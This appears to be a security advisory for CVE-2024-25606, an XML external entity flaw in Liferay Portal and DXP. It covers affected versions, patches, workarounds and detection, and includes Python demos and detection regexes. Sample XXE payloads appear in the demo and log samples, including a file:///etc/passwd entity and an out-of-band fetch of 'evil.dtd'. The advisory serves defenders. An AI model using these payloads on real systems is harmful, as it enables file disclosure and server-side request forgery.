CVE-2024-25606

8.0 HIGH

📋 TL;DR

This XML External Entity (XXE) vulnerability in Liferay Portal and Liferay DXP lets an authenticated user who holds the permission to deploy widgets, portlets or extensions supply XML that the portal parses with external entity resolution enabled. The result is disclosure of files readable by the application server (or requests to internal hosts named in the entity's SYSTEM identifier) and, via entity expansion, denial of service. Only accounts with deployment permission can trigger it, so the exposed population is administrators and developers.

💻 Affected Systems

Products:
  • Liferay Portal
  • Liferay DXP
Versions: Liferay Portal 7.2.0 through 7.4.3.7 and older unsupported versions; Liferay DXP 7.4 before update 4, 7.3 before update 12, 7.2 before fix pack 20 and older unsupported versions
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires attacker to have permission to deploy widgets/portlets/extensions

📦 What is this software?

Liferay Portal is an open-source, Java-based enterprise portal platform; Liferay DXP is the commercially supported edition of the same code base. Both let privileged users extend the running portal by deploying portlets, widgets and extensions, which is the code path this vulnerability sits in.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Disclosure of any file the application server account can read (for example portal-ext.properties with database credentials) or server-side requests to internal network hosts. Credentials recovered this way can be used to go further, up to full compromise of the portal and its backing services.

🟠 Likely Case

Unauthorized disclosure of application configuration, user data or system information readable by the application server, or resource exhaustion of the portal JVM through entity expansion.

🟢 If Mitigated

Limited impact when deployment permission is confined to a small set of trusted administrators, because an attacker must first obtain one of those accounts.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Requires an authenticated account that holds the permission to deploy widgets, portlets or extensions; no unauthenticated path is known.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Liferay Portal 7.4.3.8+, Liferay DXP 7.4 update 4+, 7.3 update 12+, 7.2 fix pack 20+

Vendor Advisory: https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25606

Restart Required: Yes

Instructions:

1. Liferay DXP: download the update or fix pack listed above from the Liferay customer portal. Liferay Portal CE: fix packs are not published for CE, so upgrade the bundle to 7.4.3.8 GA or later.
2. Apply it following Liferay's patching (or upgrade) documentation, in a staging environment first.
3. Restart the Liferay instance.
4. Confirm the new version in Control Panel → Configuration → Server Administration → System Information, or in the "Starting Liferay ..." banner the portal writes to the application server log at startup.

🔧 Temporary Workarounds

Restrict deployment permissions (all versions)

Limit who can deploy widgets/portlets/extensions to the smallest set of administrators that genuinely needs it, and review which roles currently hold that permission.

Disable XML external entity processing (all versions)

Configure XML parsers to disable external entity resolution and, where possible, to reject DOCTYPE declarations outright. This only helps for parsers you control, for example in your own portlets or extensions; the parser used by Liferay's own deployment code is fixed by the vendor patch, not by configuration.
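The following is an added example, not code from Liferay or from this advisory. It uses Python's xml.sax as a stand-in for the Java parser inside the portal to show what "disable external entity resolution" actually changes: the same XXE payload is parsed once with external general entities enabled (the vulnerable configuration) and once with them disabled (the hardened one). The "secret" file, its jdbc.default.password line and the payload are constructed for the demo.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges
from xml.sax.xmlreader import InputSource


class TextCollector(ContentHandler):
    """Gathers character data so we can see exactly what the parser resolved."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def text(self):
        return "".join(self.chunks)


def xxe_payload(secret_path):
    """Classic XXE document: an external general entity pointing at a local file.
    A descriptor shaped like this, smuggled into a deploy request, is the attack."""
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE d [<!ENTITY leak SYSTEM "file://{secret_path}">]>'
        '<d>&leak;</d>'
    )


def parse_text(xml_text, resolve_external_entities):
    """Parse an in-memory document with external general entity resolution
    switched on (vulnerable) or off (hardened) and return its text content.
    The hardened setting is the equivalent of disabling external entities on a
    Java DocumentBuilderFactory / SAXParserFactory."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    source = InputSource()
    source.setByteStream(io.BytesIO(xml_text.encode("utf-8")))
    parser.parse(source)
    return handler.text()


def demo():
    """Write a constructed 'secret' properties file, then parse the same
    payload both ways. Returns {'vulnerable': ..., 'hardened': ...}."""
    tmp = tempfile.NamedTemporaryFile("w", suffix=".properties", delete=False)
    try:
        tmp.write("jdbc.default.password=SECRET-DB-PASSWORD")  # constructed content
        tmp.close()
        payload = xxe_payload(tmp.name)
        return {
            "vulnerable": parse_text(payload, resolve_external_entities=True),
            "hardened": parse_text(payload, resolve_external_entities=False),
        }
    finally:
        os.unlink(tmp.name)


if __name__ == "__main__":
    for mode, text in demo().items():
        print(f"{mode:10s} -> {text!r}")
```

With resolution enabled the file's contents come back as the document's text; with it disabled the entity is skipped and the text is empty. In Java the corresponding hardening is to set the `http://apache.org/xml/features/disallow-doctype-decl` feature to true on the factory (or, if DOCTYPEs must be accepted, to set `http://xml.org/sax/features/external-general-entities` and `http://xml.org/sax/features/external-parameter-entities` to false).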

🧯 If You Can't Patch

  • Implement strict access controls to limit deployment permissions to trusted administrators only
  • Monitor deployment activities and audit logs for suspicious XML processing attempts

🔍 How to Verify

Check if Vulnerable:

Check the Liferay version via Control Panel → Configuration → Server Administration → System Information and compare it with the affected ranges above (Portal 7.4.3.7 and earlier; DXP 7.4 before update 4, 7.3 before update 12, 7.2 before fix pack 20).

Check Version:

Check via the Liferay Control Panel, the "Starting Liferay ..." banner in the application server log at startup, or the version property in liferay-portal.xml.

Verify Fix Applied:

Confirm the reported version is at or above the patched version, then, in a non-production environment, confirm that a deployment descriptor containing an external entity reference is no longer resolved.
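The following is an added helper, not part of this advisory or of Liferay, that encodes the affected ranges above so the check can be scripted across a fleet. It assumes a Portal CE banner that contains an x.y.z[.w] version token (the sample banner strings are constructed to resemble what System Information shows); for DXP, where the advisory is stated in terms of release line plus update or fix pack number, those two values are passed explicitly rather than parsed from a string.

```python
import re

# Version thresholds taken from the advisory text.
PORTAL_FIRST_FIXED = (7, 4, 3, 8)          # Liferay Portal CE: 7.4.3.8+ is fixed
PORTAL_OLDEST_SUPPORTED = (7, 2, 0, 0)     # anything older is unsupported (and vulnerable)
DXP_FIRST_FIXED = {"7.4": 4, "7.3": 12, "7.2": 20}  # first fixed update / fix pack per line

_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)(?:\.(\d+))?\b")


def parse_portal_version(banner):
    """Pull the first x.y.z[.w] token out of a System Information or startup
    banner string and return it as a 4-tuple so versions compare numerically."""
    m = _VERSION_RE.search(banner)
    if m is None:
        raise ValueError(f"no version found in {banner!r}")
    return tuple(int(g) if g is not None else 0 for g in m.groups())


def portal_status(banner):
    """'fixed', 'vulnerable' or 'vulnerable-unsupported' for a Liferay Portal CE
    banner. Do not feed DXP banners to this; use dxp_status for DXP."""
    version = parse_portal_version(banner)
    if version >= PORTAL_FIRST_FIXED:
        return "fixed"
    if version < PORTAL_OLDEST_SUPPORTED:
        return "vulnerable-unsupported"
    return "vulnerable"


def dxp_status(line, update):
    """Status for Liferay DXP given the release line ('7.4', '7.3', '7.2') and
    the installed update number (7.4/7.3) or fix pack number (7.2)."""
    if line not in DXP_FIRST_FIXED:
        return "vulnerable-unsupported"
    return "fixed" if update >= DXP_FIRST_FIXED[line] else "vulnerable"


if __name__ == "__main__":
    # Constructed sample banners, not copied from a real installation.
    for banner in ("Liferay Community Edition Portal 7.4.3.7 CE GA7",
                   "Liferay Community Edition Portal 7.4.3.8 CE GA8"):
        print(banner, "->", portal_status(banner))
    print("DXP 7.3 update 11 ->", dxp_status("7.3", 11))
```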

📡 Detection & Monitoring

Log Indicators:

  • XML parse errors (for example SAXParseException) raised while a deployment is being processed
  • DOCTYPE or ENTITY declarations with SYSTEM/PUBLIC identifiers, or file:// and http:// URLs, appearing in deployment-related log entries
  • Multiple deployment attempts by a single user within a short window

Network Indicators:

  • Deployment request bodies containing <!DOCTYPE or <!ENTITY declarations (needs request body inspection at a WAF or reverse proxy)
  • Outbound connections from the application server to unexpected hosts shortly after a deployment, which is what an external entity pointing at an internal or attacker-controlled URL produces

SIEM Query:

source="liferay" AND message="*deploy*" AND (message="*<!DOCTYPE*" OR message="*<!ENTITY*" OR message="*SAXParseException*")

Adjust the field names to your log schema. The query only fires if the XML payload or the parser error is actually written to the log; a bare match on "*XML*" or "*parse*" is too noisy to be useful on a portal that parses XML constantly.
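The following is an added example of the detection logic above run over log lines, not a Liferay feature or part of this advisory. The sample lines are constructed in a simplified hypothetical "timestamp level user event detail" format and are not real Liferay output; the three regexes and the burst threshold (three deployments by one user inside ten minutes) are assumptions to tune for your environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in a simplified, hypothetical
# "<timestamp> <level> <user> <event> <detail>" format. They are not real
# Liferay log lines; map the fields onto your own log schema.
SAMPLE_LOG = """\
2024-03-01 10:00:01 INFO alice deploy <?xml version="1.0"?><portlet-app><portlet>a</portlet></portlet-app>
2024-03-01 10:02:15 INFO mallory deploy <?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><portlet-app>&xxe;</portlet-app>
2024-03-01 10:03:40 INFO mallory deploy <?xml version="1.0"?><!DOCTYPE x [<!ENTITY % dtd SYSTEM "http://10.0.0.5/evil.dtd"> %dtd;]><portlet-app/>
2024-03-01 10:04:02 ERROR mallory deploy org.xml.sax.SAXParseException: premature end of file
2024-03-01 10:05:10 INFO bob deploy <?xml version="1.0"?><!DOCTYPE x [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;&a;&a;">]><portlet-app>&b;</portlet-app>
2024-03-01 11:30:00 INFO alice login ok
"""

LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (\w+) (\S+) (\S+) ?(.*)$")
# External entity declaration; group 1 is set for parameter entities (<!ENTITY % name SYSTEM ...>).
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.I)
# Internal entity whose value references another entity: the building block of expansion DoS.
ENTITY_CHAIN_RE = re.compile(r'<!ENTITY\s+[\w.-]+\s+"[^"]*&[\w.-]+;[^"]*"', re.I)
PARSE_ERROR_RE = re.compile(r"SAXParseException|XMLStreamException|ParserConfigurationException")

BURST_WINDOW = timedelta(minutes=10)   # assumed tuning values
BURST_THRESHOLD = 3


def analyze(log_text):
    """Return (timestamp, user, reason) findings for deployment-related lines."""
    findings = []
    deploys = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, level, user, event, detail = m.groups()
        if event != "deploy":
            continue
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        deploys[user].append(when)
        ee = EXTERNAL_ENTITY_RE.search(detail)
        if ee:
            findings.append((ts, user, "external-parameter-entity" if ee.group(1) else "external-entity"))
        if ENTITY_CHAIN_RE.search(detail):
            findings.append((ts, user, "entity-expansion"))
        if level == "ERROR" and PARSE_ERROR_RE.search(detail):
            findings.append((ts, user, "xml-parse-error"))
    # Burst detection: sliding window over each user's deployment timestamps.
    for user, times in deploys.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j + 1 < len(times) and times[j + 1] - times[i] <= BURST_WINDOW:
                j += 1
            if j - i + 1 >= BURST_THRESHOLD:
                findings.append((times[i].strftime("%Y-%m-%d %H:%M:%S"), user, "deploy-burst"))
                break
    return findings


if __name__ == "__main__":
    for ts, user, reason in analyze(SAMPLE_LOG):
        print(f"{ts}  {user:8s}  {reason}")
```

On the sample, alice's ordinary descriptor produces nothing, mallory's two payloads are flagged as an external entity and an external parameter entity (the second is the out-of-band variant that also explains the "unexpected outbound connection" network indicator), the parser error and the three-in-ten-minutes burst are flagged for the same user, and bob's nested internal entities are flagged as entity expansion.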

🔗 References

  • Liferay security advisory: https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25606
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2024-25606
